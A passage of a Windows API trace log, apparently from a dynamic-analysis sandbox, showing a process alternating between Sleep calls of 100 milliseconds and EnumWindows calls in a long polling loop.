[0262.376] Sleep (dwMilliseconds=0x64) [0262.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.454] Sleep (dwMilliseconds=0x64) [0262.532] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.532] Sleep (dwMilliseconds=0x64) [0262.577] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.578] Sleep (dwMilliseconds=0x64) [0262.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.617] Sleep (dwMilliseconds=0x64) [0262.682] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.682] Sleep (dwMilliseconds=0x64) [0262.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.702] Sleep (dwMilliseconds=0x64) [0262.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.741] Sleep (dwMilliseconds=0x64) [0262.792] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.792] Sleep (dwMilliseconds=0x64) [0262.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.903] Sleep (dwMilliseconds=0x64) [0262.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.940] Sleep (dwMilliseconds=0x64) [0262.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.953] Sleep (dwMilliseconds=0x64) [0262.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0262.983] Sleep (dwMilliseconds=0x64) [0263.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.025] Sleep (dwMilliseconds=0x64) [0263.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.066] Sleep (dwMilliseconds=0x64) [0263.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.103] Sleep (dwMilliseconds=0x64) [0263.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.145] Sleep (dwMilliseconds=0x64) [0263.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.301] Sleep (dwMilliseconds=0x64) [0263.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.325] Sleep (dwMilliseconds=0x64) [0263.388] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.389] Sleep (dwMilliseconds=0x64) [0263.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.520] Sleep (dwMilliseconds=0x64) [0263.555] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.556] Sleep (dwMilliseconds=0x64) [0263.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.632] Sleep (dwMilliseconds=0x64) [0263.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.705] Sleep (dwMilliseconds=0x64) [0263.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.756] Sleep (dwMilliseconds=0x64) [0263.822] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.822] Sleep (dwMilliseconds=0x64) [0263.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.904] Sleep (dwMilliseconds=0x64) [0263.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0263.967] Sleep (dwMilliseconds=0x64) [0264.012] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.012] Sleep (dwMilliseconds=0x64) [0264.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.082] Sleep (dwMilliseconds=0x64) [0264.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.161] Sleep (dwMilliseconds=0x64) [0264.243] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.243] Sleep (dwMilliseconds=0x64) [0264.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.479] Sleep (dwMilliseconds=0x64) [0264.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.565] Sleep (dwMilliseconds=0x64) [0264.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.625] Sleep (dwMilliseconds=0x64) [0264.675] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.676] Sleep (dwMilliseconds=0x64) [0264.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.910] Sleep (dwMilliseconds=0x64) [0264.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0264.986] Sleep (dwMilliseconds=0x64) [0265.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.036] Sleep (dwMilliseconds=0x64) [0265.093] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.094] Sleep (dwMilliseconds=0x64) [0265.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.168] Sleep (dwMilliseconds=0x64) [0265.233] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.635] Sleep (dwMilliseconds=0x64) [0265.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.706] Sleep (dwMilliseconds=0x64) [0265.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.782] Sleep (dwMilliseconds=0x64) [0265.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.856] Sleep (dwMilliseconds=0x64) [0265.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.912] Sleep (dwMilliseconds=0x64) [0265.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0265.986] Sleep (dwMilliseconds=0x64) [0266.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.065] Sleep (dwMilliseconds=0x64) [0266.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.113] Sleep (dwMilliseconds=0x64) [0266.173] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.174] Sleep (dwMilliseconds=0x64) [0266.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.291] Sleep (dwMilliseconds=0x64) [0266.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.356] Sleep (dwMilliseconds=0x64) [0266.418] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.419] Sleep (dwMilliseconds=0x64) [0266.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.518] Sleep (dwMilliseconds=0x64) [0266.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.604] Sleep (dwMilliseconds=0x64) [0266.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.652] Sleep (dwMilliseconds=0x64) [0266.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.726] Sleep (dwMilliseconds=0x64) [0266.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.845] Sleep (dwMilliseconds=0x64) [0266.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.896] Sleep (dwMilliseconds=0x64) [0266.967] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0266.968] Sleep (dwMilliseconds=0x64) [0267.040] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.040] Sleep (dwMilliseconds=0x64) [0267.095] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.096] Sleep (dwMilliseconds=0x64) [0267.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.151] Sleep (dwMilliseconds=0x64) [0267.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.227] Sleep (dwMilliseconds=0x64) [0267.308] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.309] Sleep (dwMilliseconds=0x64) [0267.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.359] Sleep (dwMilliseconds=0x64) [0267.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.482] Sleep (dwMilliseconds=0x64) [0267.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.554] Sleep (dwMilliseconds=0x64) [0267.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.622] Sleep (dwMilliseconds=0x64) [0267.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.693] Sleep (dwMilliseconds=0x64) [0267.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.768] Sleep (dwMilliseconds=0x64) [0267.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.823] Sleep (dwMilliseconds=0x64) [0267.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0267.885] Sleep (dwMilliseconds=0x64) [0268.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.010] Sleep (dwMilliseconds=0x64) [0268.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.076] Sleep (dwMilliseconds=0x64) [0268.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.117] Sleep (dwMilliseconds=0x64) [0268.168] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.169] Sleep (dwMilliseconds=0x64) [0268.204] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.205] Sleep (dwMilliseconds=0x64) [0268.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.287] Sleep (dwMilliseconds=0x64) [0268.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.357] Sleep (dwMilliseconds=0x64) [0268.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.442] Sleep (dwMilliseconds=0x64) [0268.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.514] Sleep (dwMilliseconds=0x64) [0268.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.579] Sleep (dwMilliseconds=0x64) [0268.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.737] Sleep (dwMilliseconds=0x64) [0268.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.776] Sleep (dwMilliseconds=0x64) [0268.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.845] Sleep (dwMilliseconds=0x64) [0268.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.917] Sleep (dwMilliseconds=0x64) [0268.961] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0268.961] Sleep (dwMilliseconds=0x64) [0269.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.027] Sleep (dwMilliseconds=0x64) [0269.091] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.092] Sleep (dwMilliseconds=0x64) [0269.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.289] Sleep (dwMilliseconds=0x64) [0269.359] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.359] Sleep (dwMilliseconds=0x64) [0269.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.438] Sleep (dwMilliseconds=0x64) [0269.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.512] Sleep (dwMilliseconds=0x64) [0269.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.552] Sleep (dwMilliseconds=0x64) [0269.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.628] Sleep (dwMilliseconds=0x64) [0269.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.706] Sleep (dwMilliseconds=0x64) [0269.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.756] Sleep (dwMilliseconds=0x64) [0269.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.817] Sleep (dwMilliseconds=0x64) [0269.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.918] Sleep (dwMilliseconds=0x64) [0269.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0269.975] Sleep (dwMilliseconds=0x64) [0270.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.027] Sleep (dwMilliseconds=0x64) [0270.111] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.111] Sleep (dwMilliseconds=0x64) [0270.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.181] Sleep (dwMilliseconds=0x64) [0270.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.224] Sleep (dwMilliseconds=0x64) [0270.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.325] Sleep (dwMilliseconds=0x64) [0270.397] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.398] Sleep (dwMilliseconds=0x64) [0270.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.448] Sleep (dwMilliseconds=0x64) [0270.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.516] Sleep (dwMilliseconds=0x64) [0270.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.597] Sleep (dwMilliseconds=0x64) [0270.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.658] Sleep (dwMilliseconds=0x64) [0270.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.720] Sleep (dwMilliseconds=0x64) [0270.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.794] Sleep (dwMilliseconds=0x64) [0270.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.876] Sleep (dwMilliseconds=0x64) [0270.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0270.915] Sleep (dwMilliseconds=0x64) [0271.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.002] Sleep (dwMilliseconds=0x64) [0271.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.097] Sleep (dwMilliseconds=0x64) [0271.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.147] Sleep (dwMilliseconds=0x64) [0271.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.213] Sleep (dwMilliseconds=0x64) [0271.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.315] Sleep (dwMilliseconds=0x64) [0271.372] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.372] Sleep (dwMilliseconds=0x64) [0271.440] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.441] Sleep (dwMilliseconds=0x64) [0271.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.777] Sleep (dwMilliseconds=0x64) [0271.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.906] Sleep (dwMilliseconds=0x64) [0271.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0271.989] Sleep (dwMilliseconds=0x64) [0272.068] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.069] Sleep (dwMilliseconds=0x64) [0272.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.159] Sleep (dwMilliseconds=0x64) [0272.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.208] Sleep (dwMilliseconds=0x64) [0272.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.298] Sleep (dwMilliseconds=0x64) [0272.378] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.378] Sleep (dwMilliseconds=0x64) [0272.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.494] Sleep (dwMilliseconds=0x64) [0272.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.612] Sleep (dwMilliseconds=0x64) [0272.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.657] Sleep (dwMilliseconds=0x64) [0272.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.663] Sleep (dwMilliseconds=0x64) [0272.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.736] Sleep (dwMilliseconds=0x64) [0272.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.774] Sleep (dwMilliseconds=0x64) [0272.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0272.906] Sleep (dwMilliseconds=0x64) [0273.012] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.013] Sleep (dwMilliseconds=0x64) [0273.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.107] Sleep (dwMilliseconds=0x64) [0273.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.159] Sleep (dwMilliseconds=0x64) [0273.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.190] Sleep (dwMilliseconds=0x64) [0273.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.226] Sleep (dwMilliseconds=0x64) [0273.285] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.285] Sleep (dwMilliseconds=0x64) [0273.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.290] Sleep (dwMilliseconds=0x64) [0273.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.333] Sleep (dwMilliseconds=0x64) [0273.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.368] Sleep (dwMilliseconds=0x64) [0273.380] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.380] Sleep (dwMilliseconds=0x64) [0273.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.413] Sleep (dwMilliseconds=0x64) [0273.449] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.449] Sleep (dwMilliseconds=0x64) [0273.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.470] Sleep (dwMilliseconds=0x64) [0273.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.492] Sleep (dwMilliseconds=0x64) [0273.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.527] Sleep (dwMilliseconds=0x64) [0273.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.565] Sleep (dwMilliseconds=0x64) [0273.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.570] Sleep (dwMilliseconds=0x64) [0273.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.606] Sleep (dwMilliseconds=0x64) [0273.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.642] Sleep (dwMilliseconds=0x64) [0273.648] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.649] Sleep (dwMilliseconds=0x64) [0273.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.693] Sleep (dwMilliseconds=0x64) [0273.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.730] Sleep (dwMilliseconds=0x64) [0273.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.746] Sleep (dwMilliseconds=0x64) [0273.767] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.767] Sleep (dwMilliseconds=0x64) [0273.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.805] Sleep (dwMilliseconds=0x64) [0273.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.855] Sleep (dwMilliseconds=0x64) [0273.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.915] Sleep (dwMilliseconds=0x64) [0273.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.952] Sleep (dwMilliseconds=0x64) [0273.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.991] Sleep (dwMilliseconds=0x64) [0273.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.993] Sleep (dwMilliseconds=0x64) [0273.996] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0273.996] Sleep (dwMilliseconds=0x64) [0274.032] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.032] Sleep (dwMilliseconds=0x64) [0274.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.070] Sleep (dwMilliseconds=0x64) [0274.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.081] Sleep (dwMilliseconds=0x64) [0274.108] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.109] Sleep (dwMilliseconds=0x64) [0274.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.144] Sleep (dwMilliseconds=0x64) [0274.163] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.163] Sleep (dwMilliseconds=0x64) [0274.182] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.182] Sleep (dwMilliseconds=0x64) [0274.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.224] Sleep (dwMilliseconds=0x64) [0274.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.269] Sleep (dwMilliseconds=0x64) [0274.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.278] Sleep (dwMilliseconds=0x64) [0274.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.315] Sleep (dwMilliseconds=0x64) [0274.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.352] Sleep (dwMilliseconds=0x64) [0274.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.357] Sleep (dwMilliseconds=0x64) [0274.388] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.388] Sleep (dwMilliseconds=0x64) [0274.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.435] Sleep (dwMilliseconds=0x64) [0274.451] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.451] Sleep (dwMilliseconds=0x64) [0274.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.476] Sleep (dwMilliseconds=0x64) [0274.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.514] Sleep (dwMilliseconds=0x64) [0274.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.541] Sleep (dwMilliseconds=0x64) [0274.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.552] Sleep (dwMilliseconds=0x64) [0274.587] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.587] Sleep (dwMilliseconds=0x64) [0274.624] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.624] Sleep (dwMilliseconds=0x64) [0274.660] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.660] Sleep (dwMilliseconds=0x64) [0274.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.697] Sleep (dwMilliseconds=0x64) [0274.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.707] Sleep (dwMilliseconds=0x64) [0274.739] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.739] Sleep (dwMilliseconds=0x64) [0274.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.776] Sleep (dwMilliseconds=0x64) [0274.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.795] Sleep (dwMilliseconds=0x64) [0274.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.813] Sleep (dwMilliseconds=0x64) [0274.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.861] Sleep (dwMilliseconds=0x64) [0274.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.892] Sleep (dwMilliseconds=0x64) [0274.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.900] Sleep (dwMilliseconds=0x64) [0274.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.938] Sleep (dwMilliseconds=0x64) [0274.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.977] Sleep (dwMilliseconds=0x64) [0274.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0274.983] Sleep (dwMilliseconds=0x64) [0275.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.019] Sleep (dwMilliseconds=0x64) [0275.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.099] Sleep (dwMilliseconds=0x64) [0275.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.120] Sleep (dwMilliseconds=0x64) [0275.141] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.142] Sleep (dwMilliseconds=0x64) [0275.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.177] Sleep (dwMilliseconds=0x64) [0275.202] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.202] Sleep (dwMilliseconds=0x64) [0275.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.217] Sleep (dwMilliseconds=0x64) [0275.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.278] Sleep (dwMilliseconds=0x64) [0275.311] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.312] Sleep (dwMilliseconds=0x64) [0275.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.316] Sleep (dwMilliseconds=0x64) [0275.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.356] Sleep (dwMilliseconds=0x64) [0275.394] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.394] Sleep (dwMilliseconds=0x64) [0275.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.401] Sleep (dwMilliseconds=0x64) [0275.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.433] Sleep (dwMilliseconds=0x64) [0275.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.469] Sleep (dwMilliseconds=0x64) [0275.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.485] Sleep (dwMilliseconds=0x64) [0275.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.511] Sleep (dwMilliseconds=0x64) [0275.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.548] Sleep (dwMilliseconds=0x64) [0275.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.574] Sleep (dwMilliseconds=0x64) [0275.585] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.585] Sleep (dwMilliseconds=0x64) [0275.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.622] Sleep (dwMilliseconds=0x64) [0275.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.656] Sleep (dwMilliseconds=0x64) [0275.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.659] Sleep (dwMilliseconds=0x64) [0275.694] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.694] Sleep (dwMilliseconds=0x64) [0275.731] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.731] Sleep (dwMilliseconds=0x64) [0275.739] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.739] Sleep (dwMilliseconds=0x64) [0275.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.771] Sleep (dwMilliseconds=0x64) [0275.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.807] Sleep (dwMilliseconds=0x64) [0275.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.825] Sleep (dwMilliseconds=0x64) [0275.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.862] Sleep (dwMilliseconds=0x64) [0275.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.899] Sleep (dwMilliseconds=0x64) [0275.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.923] Sleep (dwMilliseconds=0x64) [0275.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.937] Sleep (dwMilliseconds=0x64) [0275.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0275.975] Sleep (dwMilliseconds=0x64) [0276.020] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0276.021] Sleep (dwMilliseconds=0x64) [0276.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 